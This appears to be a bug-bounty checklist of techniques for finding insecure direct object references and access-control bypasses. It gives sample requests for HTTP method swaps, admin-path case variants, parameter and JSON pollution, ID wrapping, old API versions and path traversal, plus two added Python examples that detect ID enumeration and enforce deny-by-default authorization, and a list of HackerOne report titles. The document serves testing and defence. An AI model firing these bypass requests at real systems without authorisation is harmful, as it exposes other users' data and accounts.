IDOR Checklist
Decode encoded IDs before treating them as opaque (this one is base64 for victim@mail.com)
GET /GetUser/dmljdGltQG1haWwuY29t
[...]
Change the HTTP method
GET /users/delete/victim_id ->403
POST /users/delete/victim_id ->200
Try replacing parameter names
Instead of this:
GET /api/albums?album_id=<album id>
Try This:
GET /api/albums?account_id=<account id>
Tip: There is a Burp extension called Paramalyzer which will help with this by remembering all the parameters you have passed to a host.
Path Traversal
POST /users/delete/victim_id ->403
POST /users/delete/my_id/..victim_id ->200
Change the request Content-Type
Content-Type: application/xml ->
Content-Type: application/json
Swap a non-numeric ID for a numeric one
GET /file?id=90djbkdbkdbd29dd
GET /file?id=302
Missing Function Level Access Control
GET /admin/profile ->401
GET /Admin/profile ->200
GET /ADMIN/profile ->200
GET /aDmin/profile ->200
GET /adMin/profile ->200
GET /admIn/profile ->200
GET /admiN/profile ->200
Send a wildcard instead of an ID
GET /api/users/user_id ->
GET /api/users/*
Never ignore encoded/hashed IDs
For hashed IDs, create multiple accounts and work out the pattern the application uses to allot an ID
Google Dorking / public forums
Search for all endpoints carrying an ID that the search engine may already have indexed
Brute-force hidden HTTP parameters
Use tools like Arjun or Param Miner
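ID enumeration and parameter brute-forcing leave a recognisable trace in access logs. The following is an added example, not code from the original page, of detection logic run over a constructed log: it flags a session that touches many distinct object IDs in a short window, walks sequential numeric IDs, or accumulates 401/403 responses while guessing parameter names. The log format, session IDs and thresholds are assumptions made up for the demonstration.

```python
"""Flag object-id enumeration in access logs: a session touching many distinct ids in a
short window, walking sequential ids, or collecting 403s while guessing parameter names.
Added example over constructed log lines; not from the original page."""
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime

# Constructed log format: <iso time> sess=<session> "<method> <path>" <status>
LOG_LINE = re.compile(
    r'^(?P<ts>\S+) sess=(?P<sess>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" (?P<status>\d{3})$'
)
# The last path segment counts as an object id if it is numeric or a long opaque token.
ID_PATTERN = re.compile(r"\d+|[A-Za-z0-9_-]{16,}")

# Constructed sample: s1 reads its own order, s2 walks sequential ids, s3 guesses parameter names.
SAMPLE_LOG = """\
2024-05-01T10:00:00 sess=s1 "GET /api/orders/1001" 200
2024-05-01T10:00:04 sess=s1 "GET /api/orders/1001.json" 200
2024-05-01T10:00:09 sess=s1 "GET /api/profile" 200
2024-05-01T10:01:00 sess=s2 "GET /api/orders/2001" 200
2024-05-01T10:01:02 sess=s2 "GET /api/orders/2002" 403
2024-05-01T10:01:04 sess=s2 "GET /api/orders/2003" 403
2024-05-01T10:01:06 sess=s2 "GET /api/orders/2004" 200
2024-05-01T10:01:08 sess=s2 "GET /api/orders/2005" 403
2024-05-01T10:01:10 sess=s2 "GET /api/orders/2006" 403
2024-05-01T10:02:00 sess=s3 "GET /api/messages?user_id=77" 403
2024-05-01T10:02:01 sess=s3 "GET /api/messages?uid=77" 403
2024-05-01T10:02:02 sess=s3 "GET /api/messages?account_id=77" 403
2024-05-01T10:02:03 sess=s3 "GET /api/messages?owner_id=77" 403
"""


def object_id(path: str) -> str | None:
    """Strip the query string and any format suffix, then test the last path segment."""
    last = path.split("?", 1)[0].rsplit("/", 1)[-1].split(".", 1)[0]
    return last if ID_PATTERN.fullmatch(last) else None


def enumeration_alerts(lines, max_ids=5, window_s=60, max_denied=3) -> dict[str, list[str]]:
    """Return {session: [reasons]} for sessions whose behaviour looks like id enumeration."""
    sessions = defaultdict(lambda: {"ids": set(), "denied": 0, "times": []})
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # only the constructed format is parsed here
        s = sessions[m["sess"]]
        s["times"].append(datetime.fromisoformat(m["ts"]))
        if m["status"] in ("401", "403"):
            s["denied"] += 1
        oid = object_id(m["path"])
        if oid:
            s["ids"].add(oid)
    alerts = {}
    for sess, s in sessions.items():
        reasons = []
        span = (max(s["times"]) - min(s["times"])).total_seconds()
        if len(s["ids"]) >= max_ids and span <= window_s:
            reasons.append(f"{len(s['ids'])} distinct object ids in {span:.0f}s")
        numeric = sorted(int(i) for i in s["ids"] if i.isdigit())
        if len(numeric) >= max_ids and all(b - a == 1 for a, b in zip(numeric, numeric[1:])):
            reasons.append(f"sequential id walk {numeric[0]}..{numeric[-1]}")
        if s["denied"] >= max_denied:
            reasons.append(f"{s['denied']} denied requests")
        if reasons:
            alerts[sess] = reasons
    return alerts


if __name__ == "__main__":
    for sess, reasons in enumeration_alerts(SAMPLE_LOG.splitlines()).items():
        print(sess, "->", "; ".join(reasons))
```

The thresholds are deliberately low so the constructed sample trips them; in production they would be tuned per endpoint, and the per-session key would normally be the authenticated principal rather than a cookie, since an attacker testing with several accounts (as the checklist suggests for hashed IDs) spreads the enumeration across sessions.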
Bypass object level authorization: add the parameter onto the endpoint if it is not present by default
GET /api_v1/messages ->200
GET /api_v1/messages?user_id=victim_uuid ->200
HTTP Parameter Pollution: give multiple values for the same parameter
GET /api_v1/messages?user_id=attacker_id&user_id=victim_id
GET /api_v1/messages?user_id=victim_id&user_id=attacker_id
Change the file type
GET /user_data/2341 -> 401
GET /user_data/2341.json -> 200
GET /user_data/2341.xml -> 200
GET /user_data/2341.config -> 200
GET /user_data/2341.txt -> 200
JSON parameter pollution
{"userid":1234,"userid":2542}
Wrap the ID with an array in the body
{"userid":123} ->401
{"userid":[123]} ->200
Wrap the ID with a JSON object
{"userid":123} ->401
{"userid":{"userid":123}} ->200
Test an outdated API version
GET /v3/users_data/1234 ->401
GET /v1/users_data/1234 ->200
If the website uses GraphQL, try to find IDORs through GraphQL as well!
GET /graphql
[...]
GET /graphql.php?query=
[...]
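The checks above are written from the tester's side. The following added example (not code from the original page) shows the server-side counterpart: one deny-by-default authorization function run against constructed requests shaped like each checklist item, covering parameter pollution, duplicate JSON keys, array and object wrapping, format suffixes, API version prefixes, method swaps, dot segments in the path, case variants of /admin, wildcards and encoded IDs. The routes, the IDs 1234 and 2542, and the request shapes are assumptions made up for the demonstration.

```python
"""Deny-by-default object-level authorization, exercised against the bypass variants
from the IDOR checklist above. Added example; routes, ids and request shapes are
constructed for illustration and are not taken from the original page."""
from __future__ import annotations

import json
import posixpath
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

ID_SYNTAX = re.compile(r"^[A-Za-z0-9_-]{1,64}$")               # no dots, slashes or wildcards
FORMAT_SUFFIX = re.compile(r"\.(json|xml|txt|config)$", re.I)   # /user_data/1.json is /user_data/1
VERSION_PREFIX = re.compile(r"^/(api_)?v\d+(?=/)", re.I)        # /v1/x and /v3/x share one rule
ADMIN_ONLY = re.compile(r"^/admin(/|$)", re.I)                   # /aDmin is still /admin
# Object routes: pattern -> where the target owner's id lives ("path" or a parameter name).
ROUTES = [
    (re.compile(r"^/messages$", re.I), "user_id"),
    (re.compile(r"^/profile$", re.I), "userid"),
    (re.compile(r"^/(?:user_data|users_data|GetUser|users/delete|api/users)/([^/]+)$", re.I), "path"),
]

@dataclass
class Request:
    method: str
    url: str
    body: bytes = b""
    user_id: str = ""        # from the server-side session, never from the request itself
    is_admin: bool = False

def no_duplicate_keys(pairs):
    """json object_pairs_hook: {"userid":1,"userid":2} is an error, not last-key-wins."""
    seen = {}
    for key, value in pairs:
        if key in seen:
            raise ValueError(f"duplicate JSON key {key!r}")
        seen[key] = value
    return seen

def as_id(value) -> str:
    """Accept a plain scalar id only; arrays, nested objects and odd characters fail."""
    if isinstance(value, bool) or not isinstance(value, (str, int)):
        raise ValueError("id must be a scalar")
    text = str(value)
    if not ID_SYNTAX.match(text):
        raise ValueError(f"malformed id {text!r}")
    return text

def canonical_path(url: str) -> str:
    """Collapse dot segments, then drop the format suffix and the API version prefix."""
    path = posixpath.normpath("/" + urlsplit(url).path.lstrip("/"))
    return VERSION_PREFIX.sub("", FORMAT_SUFFIX.sub("", path))

def single_valued_params(url: str) -> dict:
    """A repeated query parameter is ambiguous, so it is rejected rather than resolved."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for key, values in params.items():
        if len(values) > 1:
            raise ValueError(f"repeated parameter {key!r}")
    return {key: values[0] for key, values in params.items()}

def json_body(body: bytes) -> dict:
    if not body:
        return {}
    data = json.loads(body, object_pairs_hook=no_duplicate_keys)
    if not isinstance(data, dict):
        raise ValueError("body must be a JSON object")
    return data

def authorize(req: Request) -> tuple[bool, str]:
    """Same decision for every HTTP method; unmatched or ambiguous requests are denied."""
    if not req.user_id:
        return False, "no session"
    try:
        path = canonical_path(req.url)
        params = single_valued_params(req.url)
        body = json_body(req.body)
        if ADMIN_ONLY.match(path):
            return (True, "admin") if req.is_admin else (False, "admin role required")
        for pattern, source in ROUTES:
            match = pattern.match(path)
            if not match:
                continue
            if source == "path":
                target = as_id(match.group(1))
            else:
                supplied = [v for v in (params.get(source), body.get(source)) if v is not None]
                targets = {as_id(v) for v in supplied}
                if len(targets) > 1:
                    raise ValueError("conflicting owner ids")
                target = targets.pop() if targets else req.user_id   # absent id means "mine"
            return (True, "owner") if target == req.user_id else (False, "not the owner")
    except ValueError as exc:
        return False, f"rejected: {exc}"
    return False, "unknown route"

ME, VICTIM = "1234", "2542"   # constructed ids; every request below runs in user 1234's session
CHECKLIST = [   # (request, expected allow)
    (Request("GET", "/api_v1/messages", user_id=ME), True),
    (Request("GET", f"/api_v1/messages?user_id={VICTIM}", user_id=ME), False),
    (Request("GET", f"/api_v1/messages?user_id={ME}&user_id={VICTIM}", user_id=ME), False),  # HPP
    (Request("GET", f"/user_data/{VICTIM}.json", user_id=ME), False),                    # file type
    (Request("POST", "/profile", b'{"userid":1234,"userid":2542}', user_id=ME), False),  # JSON pollution
    (Request("POST", "/profile", b'{"userid":[2542]}', user_id=ME), False),              # array wrap
    (Request("POST", "/profile", b'{"userid":{"userid":2542}}', user_id=ME), False),     # object wrap
    (Request("POST", "/profile", b'{"userid":1234}', user_id=ME), True),
    (Request("GET", f"/v1/users_data/{VICTIM}", user_id=ME), False),                     # old version
    (Request("POST", f"/users/delete/{VICTIM}", user_id=ME), False),                     # method swap
    (Request("POST", f"/users/delete/{ME}/../{VICTIM}", user_id=ME), False),             # dot segment
    (Request("POST", f"/users/delete/{ME}/..{VICTIM}", user_id=ME), False),              # odd segment
    (Request("GET", "/aDmin/profile", user_id=ME), False),                               # case variant
    (Request("GET", "/admin/profile", user_id="1", is_admin=True), True),
    (Request("GET", "/api/users/*", user_id=ME), False),                                 # wildcard
    (Request("GET", "/GetUser/dmljdGltQG1haWwuY29t", user_id=ME), False),                # encoded id
]

def run_checklist() -> list[str]:
    """Rows whose decision differs from the expected one; empty when every bypass is denied."""
    failures = []
    for req, expected in CHECKLIST:
        allowed, reason = authorize(req)
        if allowed != expected:
            failures.append(f"{req.method} {req.url} -> {allowed} ({reason})")
    return failures

if __name__ == "__main__":
    print("failures:", run_checklist() or "none")
```

Two design points carry most of the weight: the owner is always compared against the identity the server already holds for the session, so it does not matter how the client encodes or wraps the ID, and anything the parser cannot resolve to exactly one plain ID (repeated parameters, duplicate keys, arrays, wildcards, unknown routes) is a denial rather than a best guess.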
Authorization Bypass reports from HackerOne:
[Part II] Email Confirmation Bypass in myshop.myshopify.com that Leads to Full Privilege Escalation to Shopify - 872 upvotes, $0
Ability to reset password for account to Upserve - 602 upvotes, $0
Request smuggling on admin-official.line.me could lead to account takeover to LINE - 554 upvotes, $0
Privilege Escalation From user to SYSTEM via unauthenticated command execution to Ubiquiti Inc. - 540 upvotes, $0
Email Confirmation Bypass in your-store.myshopify.com which leads to privilege escalation to Shopify - 533 upvotes, $0
Able to Become Admin for Any LINE Official Account to LINE - 485 upvotes, $0
H1514 Ability to MiTM Shopify PoS Session to Takeover Communications to Shopify - 362 upvotes, $13337
Attacker is able to access commit title and team member comments which are supposed to be private to GitLab - 337 upvotes, $0
[Razer Pay Mobile App] Broken access control allowing other user's bank account to be deleted to Razer - 311 upvotes, $1000
Shopify admin authentication bypass using partners.shopify.com to Shopify - 290 upvotes, $20000
Oracle Webcenter Sites administrative and hi-privilege access available directly from the internet (/cs/Satellite) to LocalTapiola - 261 upvotes, $18000
Team member with Program permission only can escalate to Admin permission to HackerOne - 257 upvotes, $2500
Linux privilege escalation via trusted $PATH in keybase-redirector to Keybase - 245 upvotes, $5000
Ability to bypass partner email confirmation to take over any store given an employee email to Shopify - 230 upvotes, $15250
Privilege escalation from any user (including external) to gitlab admin when admin impersonates you to GitLab - 230 upvotes, $0
Ability to bypass email verification for OAuth grants results in accounts takeovers on 3rd parties to GitLab - 223 upvotes, $3000
Unauthenticated blind SSRF in OAuth Jira authorization controller to GitLab - 222 upvotes, $4000
[www.zomato.com] Blind XSS on one of the Admin Dashboard to Zomato - 213 upvotes, $750
Ability to DOS any organization's SSO and open up the door to account takeovers to Grammarly - 212 upvotes, $10500
Ability To Delete User(s) Account Without User Interaction to GitLab - 211 upvotes, $0
Privilege escalation in workers container to Semmle - 202 upvotes, $1500
Incorrect authorization to the intelbot service leading to ticket information to TikTok - 201 upvotes, $15000
Admin Management - Login Using Default Password - Leads to Image Upload Backdoor/Shell to Razer - 199 upvotes, $200
Ability to create own account UUID leads to stored XSS to Upserve - 198 upvotes, $1500
Unauthorized access to βββββββββ.com allows access to Uber Brazil tax documents and system. to Uber - 196 upvotes, $4500
HackerOne Jira integration plugin Leaked JWT to unauthorized jira users to HackerOne - 193 upvotes, $3000
Stealing Users OAuth authorization code via redirect_uri to pixiv - 183 upvotes, $2000
Unauthorized access to metadata of undisclosed reports that were retested to HackerOne - 180 upvotes, $0
IDOR to add secondary users in www.paypal.com/businessmanage/users/api/v1/users to PayPal - 694 upvotes, $10500
IDOR allow access to payments data of any user to Nord Security - 337 upvotes, $0
Insecure Direct Object Reference (IDOR) - Delete Campaigns to HackerOne - 280 upvotes, $0
idor allows you to delete photos and album from a gallery to Pornhub - 266 upvotes, $1500
IDOR allows any user to edit others videos to Pornhub - 246 upvotes, $1500
Singapore - Account Takeover via IDOR to Starbucks - 221 upvotes, $0
IDOR delete any Tickets on ads.tiktok.com to TikTok - 193 upvotes, $0
I.D.O.R To Order,Book,Buy,reserve On YELP FOR FREE (UNAUTHORIZED USE OF OTHER USER'S CREDIT CARD) to Yelp - 181 upvotes, $0
IDOR when editing users leads to Account Takeover without User Interaction at CrowdSignal to Automattic - 178 upvotes, $0
An IDOR that can lead to enumeration of a user and disclosure of email and phone number within cashier to Unikrn - 167 upvotes, $3000
IDOR allows an attacker to modify the links of any user to Reddit - 159 upvotes, $5000
IDOR in the https://market.semrush.com/ to Semrush - 155 upvotes, $0
IDOR leads to Edit Anyone's Blogs / Websites to Automattic - 144 upvotes, $0
[api.pandao.ru] IDOR for order delivery address to Mail.ru - 120 upvotes, $3000
IDOR vulnerability (Price manipulation) to Acronis - 119 upvotes, $0
Getting access of mod logs from any public or restricted subreddit with IDOR vulnerability to Reddit - 115 upvotes, $5000
IDOR and statistics leakage in Orders to X (Formerly Twitter) - 110 upvotes, $289
IDOR in https://3d.cs.money/ to CS Money - 110 upvotes, $0
IDOR leading to downloading of any attachment to BCM Messenger - 105 upvotes, $0
IDOR leads to leak analytics of any restaurant to Uber - 103 upvotes, $2000